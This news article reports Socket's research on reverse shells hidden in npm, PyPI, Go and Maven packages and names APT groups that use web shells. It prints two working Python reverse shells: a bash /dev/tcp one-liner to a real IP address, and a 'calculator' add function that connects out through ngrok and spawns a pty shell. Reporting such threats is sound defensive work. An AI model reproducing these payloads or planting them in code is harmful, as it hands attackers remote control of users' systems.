Shells provide crucial command-line interfaces to operating systems. While legitimate for system administration tasks, when weaponized by threat actors, shells transform into dangerous avenues for unauthorized access, system control, and data theft across organizational networks.
The misuse of these tools has become increasingly sophisticated, with malicious actors embedding shell techniques within seemingly innocuous open-source packages.
Recent investigations reveal an alarming trend of sophisticated threat actors deploying shell techniques across npm, PyPI, Go, and Maven ecosystems.
These shells enable attackers to execute commands, browse file systems, and transfer sensitive data outside networks, often operating undetected for extended periods while maintaining persistent access to compromised infrastructure.
The versatility of these techniques makes them particularly dangerous in software supply chain attacks.
Notable state-sponsored groups, including Russia’s APT28, Vietnam’s APT32, and China’s HAFNIUM, have been documented using web shells for persistent access to compromised systems.
HAFNIUM particularly targets U.S. entities across multiple industry sectors to exfiltrate valuable trade secrets through compromised servers and web applications, highlighting the nation-state level interest in these attack methodologies.
Socket researchers identified multiple instances of malicious shell code hidden within legitimate-looking open-source packages.
Through large-scale scanning and real-time analysis, Socket’s threat research team uncovered how attackers obfuscate malicious payloads to evade detection while establishing persistent access channels to victim systems.
Their findings demonstrate the evolution of these threats and the increasing sophistication of concealment techniques.
The impact extends beyond immediate data theft, as compromised systems serve as persistent backdoors, enabling lateral movement and privilege escalation over time, potentially leading to catastrophic data breaches if left undetected.
Organizations unwittingly incorporating vulnerable or malicious dependencies face significant risks to their data integrity and operational security.
PyPI Shell Techniques
The most concerning discoveries in the PyPI ecosystem involve classic reverse shell implementations that provide attackers with complete system control.
One example shows code creating an interactive bash shell redirecting all input/output to a remote connection:-
import os
os.system("bash -c 'bash -i >& /dev/tcp/103.252.137.168/7777 0>&1'")This seemingly simple code imports the os module and executes a bash command creating a TCP connection to a Vietnamese IP address on port 7777, giving the attacker full shell access to the compromised system.
The use of non-standard port 7777, which is typically left open for developer applications, makes this attack particularly effective at evading detection.
A more sophisticated example masquerades as a calculator function while establishing a reverse shell through ngrok tunneling:-
import socket,subprocess,os
class calculator:
def add(x, y):
s=socket. Socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("2.tcp.ngrok.io",14048))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(), 2)
import pty
pty.spawn("sh")
return x + yThis deceptive code returns the sum of inputs while creating a pseudo-terminal supporting advanced functionality including text editors and command history, making detection extraordinarily challenging for traditional security tools.
The use of ngrok as a tunneling service makes the connection more difficult to block, while the PTY module creates a “pseudo-terminal” enabling complex terminal operations.
Socket experts recommend strengthening defenses by incorporating supply chain security tools, enforcing strong policies for third-party dependencies, and conducting regular reviews to minimize these increasingly sophisticated shell-based attack risks.
Equip your team with real-time threat analysis With ANY.RUN’s interactive cloud sandbox -> Try 14-day Free Trial
The post Threat Actors Weaponize Shell Techniques to Maintain Persistence and Exfiltrate Data appeared first on Cyber Security News.
The original article found on Cyber Security News Read More
